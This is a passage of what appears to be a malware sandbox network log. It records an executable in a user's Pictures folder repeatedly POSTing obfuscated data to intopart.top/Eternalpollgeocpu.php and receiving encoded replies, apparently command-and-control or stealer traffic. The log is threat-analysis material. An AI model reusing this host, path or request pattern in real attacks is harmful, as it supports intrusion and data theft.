Apr 29, 2024 01:03:30.552784920 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49797	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:30.787390947 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:30.897986889 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:30.898279905 CEST	1080	OUT	Data Raw: 5d 5a 5a 5b 50 5c 5e 51 54 56 50 51 5a 51 51 54 5b 5a 5e 41 54 52 50 40 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]ZZ[P\^QTVPQZQQT[Z^ATRP@]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%;4;&%85+'>/**+(08/?9]7#_$ Z/!Z/
Apr 29, 2024 01:03:31.279705048 CEST	589	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jnM%2FYkbqfWXv%2FPfhhKXwW0EppA7QY%2FFeBY2rIuMUDuar%2FkE%2BUUU4q1ZJyylR0YC5ZT6lL35VSJgSKEu5cRtdPUdasOQafW4he%2BSOExj%2Fbv4Kyx9XSEihJS8LjlDdYc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafa1cb2d2af2-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:31.279766083 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49798	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:31.443100929 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:03:31.554579020 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:31.554858923 CEST	1788	OUT	Data Raw: 5d 5e 5a 5e 55 5d 5e 53 54 56 50 51 5a 55 51 50 5b 5f 5e 42 54 53 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^Z^U]^STVPQZUQP[_^BTSPE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$'-3422>2,7&=>9-?=,$ ;?5Y7&[&: Z/!Z/(
Apr 29, 2024 01:03:31.977374077 CEST	730	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DMDz56u9BoS0Dn1GX78Hry%2BSckVNMboaWsLrlDigT2W1NFJNd%2FMtWLaSjRkLUFRPSpTHVvHZKC2xUzlCxFcrVMODFiGJ8IrY0guKj0wHYIZvhKSP1UcWL%2FmHCAxjuNQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafa5efe313f5-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 13 3f 38 25 53 3d 21 39 09 30 32 27 52 27 2f 23 1d 2a 2f 36 06 32 55 3b 04 2d 3e 0f 0f 27 0a 3c 5f 23 17 38 5f 32 0f 2c 08 2b 24 20 59 02 1c 39 06 24 29 2a 59 25 3d 37 14 29 22 29 1b 21 07 34 10 3e 2b 22 14 27 59 39 14 28 55 3a 11 28 3a 38 57 2d 2d 3d 5e 25 19 27 52 3f 25 2c 52 08 13 20 53 29 23 24 1c 21 06 3f 1e 30 0c 29 06 26 1c 38 0f 23 3b 28 1f 28 17 28 5e 27 32 25 02 32 21 32 56 2d 20 33 07 20 02 3d 59 33 17 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 ?8%S=!902'R'/#/62U;->'<_#8_2,+$ Y9$)Y%=7)")!4>+"'Y9(U:(:8W--=^%'R?%,R S)#$!?0)&8#;(((^'2%2!2V- 3 =Y3!\/ I4]S
Apr 29, 2024 01:03:31.977436066 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49799	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:31.521130085 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:31.630997896 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:31.631186962 CEST	1080	OUT	Data Raw: 58 5f 5a 59 55 5d 5b 57 54 56 50 51 5a 51 51 52 5b 5c 5e 45 54 53 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X_ZYU][WTVPQZQQR[\^ETSPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'%-041-!\/%<T$= Y>\&S+=303R/Y943=$ Z/!Z/
Apr 29, 2024 01:03:32.054788113 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Psw8ghsP6GW5F9N7yViUIwV8hg78rY%2BGNqAyOvLSV60a5P7eyNRZ358GLRDSPox46Ub3SJ6j2qoqzLz6%2FQbqc4L25AxE6SZnaIjKvDVo0b0N9tZC1cgg8CoBrRO8zI0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafa65af46350-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:32.054840088 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49800	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:33.727009058 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:03:33.839577913 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:33.839802980 CEST	1076	OUT	Data Raw: 58 5d 5a 5f 50 59 5b 52 54 56 50 51 5a 56 51 57 5b 52 5e 49 54 5e 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]Z_PY[RTVPQZVQW[R^IT^PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$'-8Z#"$\2X&-%/$-<(:2V?=$+R8<& 3^3: Z/!Z/4
Apr 29, 2024 01:03:34.233561039 CEST	570	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jrJOteJc9WrkxOydhwSALd63LbYnib0YJwgZjEqV5u2BT8%2BzfFMx9t5Pdd9CSiGgNp9pmK8ADenWBxws3TwOccbzJlzBl3F2cTjSnMvR5ND1Xi8LtUWC%2Bs4N2T15dKQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafb42b266082-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:34.233604908 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49801	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:35.543540001 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:35.653649092 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:36.211579084 CEST	1080	OUT	Data Raw: 58 5c 5f 5b 50 5d 5b 57 54 56 50 51 5a 5f 51 5b 5b 5f 5e 46 54 5a 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\_[P][WTVPQZ_Q[[_^FTZPF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'%=,[!"8_&,%00*S?3R30?R;Y97 )3: Z/!Z/
Apr 29, 2024 01:03:36.628314972 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cCVIseenXmYjZr8BhRU3T%2Fn7BW5LHr1YdmFl%2F742j7IlUZ52Nb8vxT5qGNWQLXH6QhYPwtwwVJTTChBy080LnBNTnrHoKmJz7%2Bvc0pUxYus2Y7ShCjOZP7rvBebjc4w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafbf8957616e-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:36.628359079 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49802	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:36.981051922 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:37.091358900 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:37.091571093 CEST	1080	OUT	Data Raw: 5d 58 5a 5b 50 59 5b 50 54 56 50 51 5a 50 51 50 5b 5a 5e 45 54 5a 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]XZ[PY[PTVPQZPQP[Z^ETZPH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%[#71/1/5#3=>!([<$3W-?7#' Z/!Z/<
Apr 29, 2024 01:03:37.483685017 CEST	576	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJ8CLTVDYwuMCXRbRsqz4RLE9QmVJgNlnvdAVCwbSQT0Wl%2FIjvIwP4ttTaeA0hgZ3eFpD%2FGuu%2FXFgloA7YSm1PBhhUq2krszuISGvpL8essnJZWKEbIYAY%2FXFKSfa%2B4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafc87f1261ce-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:37.483707905 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:37.483722925 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49803	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:37.099370956 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:03:37.212356091 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:37.212548971 CEST	1788	OUT	Data Raw: 5d 5f 5a 5d 55 5a 5b 56 54 56 50 51 5a 53 51 52 5b 59 5e 42 54 59 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]_Z]UZ[VTVPQZSQR[Y^BTYPH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1'418&>%/$0=:(-3#(85\"#$: Z/!Z/0
Apr 29, 2024 01:03:37.653624058 CEST	738	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqBPIF5ymx4MHqnOBgq%2FU6G7sHlBxzVpAdNM4m2%2F2bk0qDgHXTawoMnW%2BzDcpFyzPA9sxSQuRZCnLMu1PCp%2B0Py60L%2FrwU8bFfQ0Y%2FcOIQoUAvKEIBCj%2BXsPSIjJwts%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafc939bc111b-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 5d 28 05 29 1d 2a 22 35 0b 30 1c 30 0b 26 2f 38 08 29 59 2e 43 31 33 0e 5a 3b 3e 3e 56 24 34 3c 5d 34 17 24 59 32 31 3c 0e 2b 0e 20 59 02 1c 39 09 32 00 22 12 25 10 33 59 3f 1c 25 5e 21 10 38 13 3e 38 03 0b 30 3f 2a 06 28 55 31 00 28 17 30 57 2d 13 39 18 31 19 27 10 28 0f 2c 52 08 13 20 54 3f 1e 3f 0f 22 2b 3f 10 24 32 25 07 26 1b 06 08 36 06 34 53 2b 2a 34 5d 33 31 3a 11 31 1c 21 09 2c 33 2c 18 20 3c 22 03 24 17 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 ]()"500&/8)Y.C13Z;>>V$4<]4$Y21<+ Y92"%3Y?%^!8>80?(U1(0W-91'(,R T??"+?$2%&64S+*4]31:1!,3, <"$!\/ I4]S
Apr 29, 2024 01:03:37.653656006 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49804	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:37.730226994 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:37.840893030 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:37.841108084 CEST	1080	OUT	Data Raw: 5d 5a 5f 5f 55 5c 5b 55 54 56 50 51 5a 54 51 50 5b 58 5e 48 54 58 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]Z__U\[UTVPQZTQP[X^HTXPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'&-+#<%X", &.<Y=)&<-$3 ?R-/[#:3 Z/!Z/,
Apr 29, 2024 01:03:38.263811111 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BVzThrzizDYq9QbHQ9PyOgcSm1QqSvHVeX9FYBrzozOp7kMklrDrbgiSohUo0jxE0NdIPYOCBsDDyNtXpglBE8UYfjPIr2q06ZV1KIzEjkTBZJlIvgJ5If%2BkWAfmXb8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafcd2b2289ef-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:38.263843060 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49805	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:38.528333902 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:38.638392925 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:38.638571024 CEST	1080	OUT	Data Raw: 58 5a 5a 50 55 5d 5b 5f 54 56 50 51 5a 55 51 55 5b 59 5e 45 54 5f 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XZZPU][_TVPQZUQU[Y^ET_PD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$2>3420X2>5^8&4P3#=9&<=0+V/:#!&: Z/!Z/(
Apr 29, 2024 01:03:38.927175045 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDUDjh1S9xSRqZKfus87YQ%2BROl%2B%2BPFhzMSlD2CShpepnhO7lcBLlkqJCLiQx32NmiwQcXuZvUuseVgWuZyM47YsXXzlyKwpEbAlbSQOCs7ESM8Xfh1AMLg92r5hUP3o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafd229f52c38-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:38.927237988 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49806	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:39.160852909 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:39.271306992 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:39.271482944 CEST	1080	OUT	Data Raw: 58 5c 5f 58 55 59 5e 53 54 56 50 51 5a 52 51 52 5b 52 5e 49 54 5a 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\_XUY^STVPQZRQR[R^ITZPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[&>8\ 10^2!/+&>$_>:V++V'U$,>40&^': Z/!Z/4
Apr 29, 2024 01:03:39.654831886 CEST	570	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abO89PLQ%2B9tkYwOW6udkUoi%2Bq559RAB0XULBniAWN6Tb3iac0sSLGX674OJkILETzCeYqLD0KUaLZktSXLIKXyja1vfVHu9uooj83zO0p1EyRt52OvdZ9Ffk4sxMgok%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafd61f2062bd-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:39.654889107 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:39.654922009 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49807	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:39.894431114 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:40.005453110 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:40.005656958 CEST	1080	OUT	Data Raw: 5d 5e 5a 51 50 5b 5b 54 54 56 50 51 5a 50 51 57 5b 5e 5e 40 54 52 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^ZQP[[TTVPQZPQW[^^@TRPH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%[3#!'2>-%/'>0>:*R?=V$U$/\# :_': Z/!Z/<
